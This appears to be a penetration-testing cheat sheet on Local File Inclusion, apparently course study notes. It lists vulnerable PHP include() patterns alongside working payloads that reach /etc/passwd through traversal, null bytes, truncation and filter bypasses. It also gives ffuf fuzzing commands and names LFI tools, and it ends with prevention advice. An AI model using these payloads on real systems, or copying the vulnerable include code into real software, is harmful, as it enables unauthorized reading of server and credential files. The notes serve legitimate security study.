LFI

Function	Read Content	Execute	Remote URL
PHP
include()/include_once()	✅	✅	✅
require()/require_once()	✅	✅	❌
file_get_contents()	✅	❌	✅
fopen()/file()	✅	❌	❌
NodeJS
fs.readFile()	✅	❌	❌
fs.sendFile()	✅	❌	❌
res.render()	✅	✅	❌
Java
include	✅	❌	❌
import	✅	✅	✅
.NET
@Html.Partial()	✅	❌	❌
@Html.RemotePartial()	✅	❌	✅
Response.WriteFile()	✅	❌	❌
include	✅	✅	✅

---

Local File Inclusion

Basic LFI

include($_GET['language']);

?language=/etc/passwd

Path Traversal

include("./languages/" . $_GET['language']);

?language=../../../etc/passwd

Filename Prefix

include("lang_" . $_GET['language']);

?language=/../../../etc/passwd

Note: This may not always work, as in this example a directory named lang_/ may not exist, so our relative path may not be correct.

Appended Extensions

include($_GET['language'] . ".php");

Path Truncation

4096 chars

?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]

Null bytes

/etc/passwd%00

Second order Attacks

/profile/$username/avatar.png -> ../../../etc/passwd

---

Basic Bypasses

Non-recursive Path Traversal Filters

$language = str_replace('../', '', $_GET['language']);

....// or ..././ or ..../ or ....////

Encoding

%2e%2e%2f

Approved Paths

if(preg_match('/^\.\/languages\/.+$/', $_GET['language'])) {
    include($_GET['language']);
} else {
    echo 'Illegal path specified!';
}

./languages/../../../../etc/passwd

---

Automated Scanning

Fuzzing GET parameters

$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

Using Wordlist

$ ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

Fuzzing Server Files

Server Web Root

• default-web-root-directory-linux.txt

• default-web-root-directory-windows.txt

Server Logs/Configs

• LFI-Jhaddix.txt

• wordlist for Linux

• wordlist for Windows

LFI Tools

• LFISuite

• LFiFreak

• liffy

---

Prevention

File Inclusion Prevention

case-match (whitelisting)

Preventing Directory Traversal

while(substr_count($input, '../', 0)) {
    $input = str_replace('../', '', $input);
};

Web Server Configuration

allow_url_fopen and allow_url_include to Off.

use Docker or open_basedir = /var/www in php.ini

Disable PHP Expect and mod_userdir

WAF